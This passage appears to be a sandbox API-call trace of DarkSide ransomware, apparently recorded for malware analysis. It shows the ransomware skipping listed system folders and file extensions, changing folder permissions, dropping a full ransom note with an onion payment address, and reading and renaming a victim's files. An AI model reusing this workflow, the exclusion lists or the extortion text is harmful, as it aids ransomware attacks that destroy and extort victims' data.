0xb [0157.843] _wcsicmp (_Str1="system volume information", _Str2="_private") returned 20 [0157.843] wcslen (_String="system volume information") returned 0x19 [0157.843] _wcsicmp (_Str1="tor browser", _Str2="_private") returned 21 [0157.844] wcslen (_String="tor browser") returned 0xb [0157.844] _wcsicmp (_Str1="windows.old", _Str2="_private") returned 24 [0157.844] wcslen (_String="windows.old") returned 0xb [0157.844] _wcsicmp (_Str1="intel", _Str2="_private") returned 10 [0157.844] wcslen (_String="intel") returned 0x5 [0157.844] _wcsicmp (_Str1="msocache", _Str2="_private") returned 14 [0157.844] wcslen (_String="msocache") returned 0x8 [0157.844] _wcsicmp (_Str1="perflogs", _Str2="_private") returned 17 [0157.844] wcslen (_String="perflogs") returned 0x8 [0157.844] _wcsicmp (_Str1="x64dbg", _Str2="_private") returned 25 [0157.844] wcslen (_String="x64dbg") returned 0x6 [0157.844] _wcsicmp (_Str1="public", _Str2="_private") returned 17 [0157.844] wcslen (_String="public") returned 0x6 [0157.844] _wcsicmp (_Str1="all users", _Str2="_private") returned 2 [0157.844] wcslen (_String="all users") returned 0x9 [0157.844] _wcsicmp (_Str1="default", _Str2="_private") returned 5 [0157.844] wcslen (_String="default") returned 0x7 [0157.844] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" [0157.844] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 0x37 [0157.844] wcscpy (in: _Dest=0x32200bc, _Source="_private" | out: _Dest="_private") returned="_private" [0157.844] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0157.844] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0157.846] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0157.846] GetNamedSecurityInfoW () returned 0x0 [0157.846] SetEntriesInAclW () returned 0x0 [0157.846] SetNamedSecurityInfoW () returned 0x0 [0157.848] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c450) returned 1 [0157.848] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.848] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private")) returned 1 [0157.848] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0157.848] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0157.848] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0157.858] CloseHandle (hObject=0x1a4) returned 1 [0157.859] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0157.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private")) returned 0x12 [0157.859] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="" [0157.859] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 0x3f [0157.859] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0157.859] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x8bc7bb20, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bc7bb20, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.860] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0157.860] _wcsicmp (_Str1="folder.ico", _Str2="README.c06622a1.TXT") returned -12 [0157.860] wcsstr (_Str="folder.ico", _SubStr="README") returned 0x0 [0157.860] _wcsicmp (_Str1="autorun.inf", _Str2="folder.ico") returned -5 [0157.860] wcslen (_String="autorun.inf") returned 0xb [0157.860] _wcsicmp (_Str1="boot.ini", _Str2="folder.ico") returned -4 [0157.860] wcslen (_String="boot.ini") returned 0x8 [0157.860] _wcsicmp (_Str1="bootfont.bin", _Str2="folder.ico") returned -4 [0157.860] wcslen (_String="bootfont.bin") returned 0xc [0157.860] _wcsicmp (_Str1="bootsect.bak", _Str2="folder.ico") returned -4 [0157.861] wcslen (_String="bootsect.bak") returned 0xc [0157.861] _wcsicmp (_Str1="desktop.ini", _Str2="folder.ico") returned -2 [0157.861] wcslen (_String="desktop.ini") returned 0xb [0157.861] _wcsicmp (_Str1="iconcache.db", _Str2="folder.ico") returned 3 [0157.861] wcslen (_String="iconcache.db") returned 0xc [0157.861] _wcsicmp (_Str1="ntldr", _Str2="folder.ico") returned 8 [0157.861] wcslen (_String="ntldr") returned 0x5 [0157.861] _wcsicmp (_Str1="ntuser.dat", _Str2="folder.ico") returned 8 [0157.861] wcslen (_String="ntuser.dat") returned 0xa [0157.861] _wcsicmp (_Str1="ntuser.dat.log", _Str2="folder.ico") returned 8 [0157.861] wcslen (_String="ntuser.dat.log") returned 0xe [0157.861] _wcsicmp (_Str1="ntuser.ini", _Str2="folder.ico") returned 8 [0157.861] wcslen (_String="ntuser.ini") returned 0xa [0157.861] _wcsicmp (_Str1="thumbs.db", _Str2="folder.ico") returned 14 [0157.861] wcslen (_String="thumbs.db") returned 0x9 [0157.861] _wcsicmp (_Str1="386", _Str2="ico") returned -54 [0157.861] wcslen (_String="386") returned 0x3 [0157.861] _wcsicmp (_Str1="adv", _Str2="ico") returned -8 [0157.861] wcslen (_String="adv") returned 0x3 [0157.861] _wcsicmp (_Str1="ani", _Str2="ico") returned -8 [0157.861] wcslen (_String="ani") returned 0x3 [0157.861] _wcsicmp (_Str1="bat", _Str2="ico") returned -7 [0157.861] wcslen (_String="bat") returned 0x3 [0157.861] _wcsicmp (_Str1="bin", _Str2="ico") returned -7 [0157.861] wcslen (_String="bin") returned 0x3 [0157.861] _wcsicmp (_Str1="cab", _Str2="ico") returned -6 [0157.861] wcslen (_String="cab") returned 0x3 [0157.861] _wcsicmp (_Str1="cmd", _Str2="ico") returned -6 [0157.861] wcslen (_String="cmd") returned 0x3 [0157.861] _wcsicmp (_Str1="com", _Str2="ico") returned -6 [0157.861] wcslen (_String="com") returned 0x3 [0157.861] _wcsicmp (_Str1="cpl", _Str2="ico") returned -6 [0157.862] wcslen (_String="cpl") returned 0x3 [0157.862] _wcsicmp (_Str1="cur", _Str2="ico") returned -6 [0157.862] wcslen (_String="cur") returned 0x3 [0157.862] _wcsicmp (_Str1="deskthemepack", _Str2="ico") returned -5 [0157.862] wcslen (_String="deskthemepack") returned 0xd [0157.862] _wcsicmp (_Str1="diagcab", _Str2="ico") returned -5 [0157.862] wcslen (_String="diagcab") returned 0x7 [0157.862] _wcsicmp (_Str1="diagcfg", _Str2="ico") returned -5 [0157.862] wcslen (_String="diagcfg") returned 0x7 [0157.862] _wcsicmp (_Str1="diagpkg", _Str2="ico") returned -5 [0157.862] wcslen (_String="diagpkg") returned 0x7 [0157.862] _wcsicmp (_Str1="dll", _Str2="ico") returned -5 [0157.862] wcslen (_String="dll") returned 0x3 [0157.862] _wcsicmp (_Str1="drv", _Str2="ico") returned -5 [0157.862] wcslen (_String="drv") returned 0x3 [0157.862] _wcsicmp (_Str1="exe", _Str2="ico") returned -4 [0157.862] wcslen (_String="exe") returned 0x3 [0157.862] _wcsicmp (_Str1="hlp", _Str2="ico") returned -1 [0157.862] wcslen (_String="hlp") returned 0x3 [0157.862] _wcsicmp (_Str1="icl", _Str2="ico") returned -3 [0157.862] wcslen (_String="icl") returned 0x3 [0157.862] _wcsicmp (_Str1="icns", _Str2="ico") returned -1 [0157.862] wcslen (_String="icns") returned 0x4 [0157.862] _wcsicmp (_Str1="ico", _Str2="ico") returned 0 [0157.862] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc7bb20, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8bc7bb20, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bca1c80, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0157.862] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0157.862] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.862] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0157.863] _wcsicmp (_Str1="backup", _Str2="_private") returned 3 [0157.863] wcslen (_String="backup") returned 0x6 [0157.863] _wcsicmp (_Str1="bak", _Str2="_private") returned 3 [0157.863] wcslen (_String="bak") returned 0x3 [0157.863] _wcsicmp (_Str1="back", _Str2="_private") returned 3 [0157.863] wcslen (_String="back") returned 0x4 [0157.863] _wcsicmp (_Str1="archive", _Str2="_private") returned 2 [0157.863] wcslen (_String="archive") returned 0x7 [0157.863] _wcsicmp (_Str1="bckp", _Str2="_private") returned 3 [0157.863] wcslen (_String="bckp") returned 0x4 [0157.863] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0157.863] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0157.863] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.863] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0157.863] _wcsicmp (_Str1="backup", _Str2="My Shapes") returned -11 [0157.863] wcslen (_String="backup") returned 0x6 [0157.863] _wcsicmp (_Str1="bak", _Str2="My Shapes") returned -11 [0157.863] wcslen (_String="bak") returned 0x3 [0157.863] _wcsicmp (_Str1="back", _Str2="My Shapes") returned -11 [0157.863] wcslen (_String="back") returned 0x4 [0157.863] _wcsicmp (_Str1="archive", _Str2="My Shapes") returned -12 [0157.863] wcslen (_String="archive") returned 0x7 [0157.864] _wcsicmp (_Str1="bckp", _Str2="My Shapes") returned -11 [0157.864] wcslen (_String="bckp") returned 0x4 [0157.864] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.866] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.867] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0157.867] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abfb8e0, ftCreationTime.dwHighDateTime=0x1d5ddb6, ftLastAccessTime.dwLowDateTime=0x50e4f420, ftLastAccessTime.dwHighDateTime=0x1d5e2ce, ftLastWriteTime.dwLowDateTime=0x50e4f420, ftLastWriteTime.dwHighDateTime=0x1d5e2ce, nFileSizeHigh=0x0, nFileSizeLow=0xd046, dwReserved0=0x0, dwReserved1=0x0, cFileName="N2N0 FWw405aMO.pptx", cAlternateFileName="N2N0FW~1.PPT")) returned 1 [0157.867] _wcsicmp (_Str1="N2N0 FWw405aMO.pptx", _Str2="README.c06622a1.TXT") returned -4 [0157.867] wcsstr (_Str="N2N0 FWw405aMO.pptx", _SubStr="README") returned 0x0 [0157.867] _wcsicmp (_Str1="autorun.inf", _Str2="N2N0 FWw405aMO.pptx") returned -13 [0157.867] wcslen (_String="autorun.inf") returned 0xb [0157.867] _wcsicmp (_Str1="boot.ini", _Str2="N2N0 FWw405aMO.pptx") returned -12 [0157.867] wcslen (_String="boot.ini") returned 0x8 [0157.867] _wcsicmp (_Str1="bootfont.bin", _Str2="N2N0 FWw405aMO.pptx") returned -12 [0157.867] wcslen (_String="bootfont.bin") returned 0xc [0157.867] _wcsicmp (_Str1="bootsect.bak", _Str2="N2N0 FWw405aMO.pptx") returned -12 [0157.867] wcslen (_String="bootsect.bak") returned 0xc [0157.867] _wcsicmp (_Str1="desktop.ini", _Str2="N2N0 FWw405aMO.pptx") returned -10 [0157.867] wcslen (_String="desktop.ini") returned 0xb [0157.867] _wcsicmp (_Str1="iconcache.db", _Str2="N2N0 FWw405aMO.pptx") returned -5 [0157.867] wcslen (_String="iconcache.db") returned 0xc [0157.867] _wcsicmp (_Str1="ntldr", _Str2="N2N0 FWw405aMO.pptx") returned 66 [0157.867] wcslen (_String="ntldr") returned 0x5 [0157.867] _wcsicmp (_Str1="ntuser.dat", _Str2="N2N0 FWw405aMO.pptx") returned 66 [0157.867] wcslen (_String="ntuser.dat") returned 0xa [0157.867] _wcsicmp (_Str1="ntuser.dat.log", _Str2="N2N0 FWw405aMO.pptx") returned 66 [0157.867] wcslen (_String="ntuser.dat.log") returned 0xe [0157.867] _wcsicmp (_Str1="ntuser.ini", _Str2="N2N0 FWw405aMO.pptx") returned 66 [0157.867] wcslen (_String="ntuser.ini") returned 0xa [0157.867] _wcsicmp (_Str1="thumbs.db", _Str2="N2N0 FWw405aMO.pptx") returned 6 [0157.867] wcslen (_String="thumbs.db") returned 0x9 [0157.867] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.867] wcslen (_String="386") returned 0x3 [0157.868] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.868] wcslen (_String="adv") returned 0x3 [0157.868] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.868] wcslen (_String="ani") returned 0x3 [0157.868] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.868] wcslen (_String="bat") returned 0x3 [0157.868] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.868] wcslen (_String="bin") returned 0x3 [0157.868] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.868] wcslen (_String="cab") returned 0x3 [0157.868] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.868] wcslen (_String="cmd") returned 0x3 [0157.868] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.868] wcslen (_String="com") returned 0x3 [0157.868] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.868] wcslen (_String="cpl") returned 0x3 [0157.868] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.868] wcslen (_String="cur") returned 0x3 [0157.868] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.868] wcslen (_String="deskthemepack") returned 0xd [0157.868] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.868] wcslen (_String="diagcab") returned 0x7 [0157.868] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.868] wcslen (_String="diagcfg") returned 0x7 [0157.868] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.868] wcslen (_String="diagpkg") returned 0x7 [0157.868] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.868] wcslen (_String="dll") returned 0x3 [0157.868] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.868] wcslen (_String="drv") returned 0x3 [0157.868] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.868] wcslen (_String="exe") returned 0x3 [0157.869] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.869] wcslen (_String="hlp") returned 0x3 [0157.869] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.869] wcslen (_String="icl") returned 0x3 [0157.869] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.869] wcslen (_String="icns") returned 0x4 [0157.869] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.869] wcslen (_String="ico") returned 0x3 [0157.869] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.869] wcslen (_String="ics") returned 0x3 [0157.869] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.869] wcslen (_String="idx") returned 0x3 [0157.869] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.869] wcslen (_String="ldf") returned 0x3 [0157.869] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.869] wcslen (_String="lnk") returned 0x3 [0157.869] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.869] wcslen (_String="mod") returned 0x3 [0157.869] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.869] wcslen (_String="mpa") returned 0x3 [0157.869] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.869] wcslen (_String="msc") returned 0x3 [0157.869] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.869] wcslen (_String="msp") returned 0x3 [0157.869] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.869] wcslen (_String="msstyles") returned 0x8 [0157.869] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.869] wcslen (_String="msu") returned 0x3 [0157.869] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.869] wcslen (_String="nls") returned 0x3 [0157.869] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.869] wcslen (_String="nomedia") returned 0x7 [0157.869] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.869] wcslen (_String="ocx") returned 0x3 [0157.870] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.870] wcslen (_String="prf") returned 0x3 [0157.870] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.870] wcslen (_String="ps1") returned 0x3 [0157.870] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.870] wcslen (_String="rom") returned 0x3 [0157.870] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.870] wcslen (_String="rtp") returned 0x3 [0157.870] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.870] wcslen (_String="scr") returned 0x3 [0157.870] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.870] wcslen (_String="shs") returned 0x3 [0157.870] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.870] wcslen (_String="spl") returned 0x3 [0157.870] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.870] wcslen (_String="sys") returned 0x3 [0157.870] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.870] wcslen (_String="theme") returned 0x5 [0157.870] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.870] wcslen (_String="themepack") returned 0x9 [0157.870] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.870] wcslen (_String="wpx") returned 0x3 [0157.870] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.870] wcslen (_String="lock") returned 0x4 [0157.870] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.870] wcslen (_String="key") returned 0x3 [0157.870] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.870] wcslen (_String="hta") returned 0x3 [0157.870] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.870] wcslen (_String="msi") returned 0x3 [0157.870] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.870] wcslen (_String="pdb") returned 0x3 [0157.871] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.871] wcslen (_String="sqlite") returned 0x6 [0157.871] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.871] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.871] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.871] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.871] wcscpy (in: _Dest=0x32100a0, _Source="N2N0 FWw405aMO.pptx" | out: _Dest="N2N0 FWw405aMO.pptx") returned="N2N0 FWw405aMO.pptx" [0157.871] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx", dwFileAttributes=0x80) returned 1 [0157.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n2n0 fww405amo.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0157.871] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.871] ReadFile (in: hFile=0x19c, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.872] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xe51ff84a [0157.872] RtlComputeCrc32 (PartialCrc=0xf84a, Buffer=0x32ec24, Length=0x80) returned 0xae0ed1a1 [0157.872] RtlComputeCrc32 (PartialCrc=0xd1a1, Buffer=0x32ec24, Length=0x80) returned 0x33c8ca62 [0157.872] RtlComputeCrc32 (PartialCrc=0xca62, Buffer=0x32ec24, Length=0x80) returned 0x6d7bb5d9 [0157.872] RtlComputeCrc32 (PartialCrc=0xb5d9, Buffer=0x32ec24, Length=0x80) returned 0xb36ca2fa [0157.872] CloseHandle (hObject=0x19c) returned 1 [0157.872] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.872] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx" [0157.872] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx") returned 0x3f [0157.872] wcscpy (in: _Dest=0x32200ce, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.872] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 FWw405aMO.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n2n0 fww405amo.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N2N0 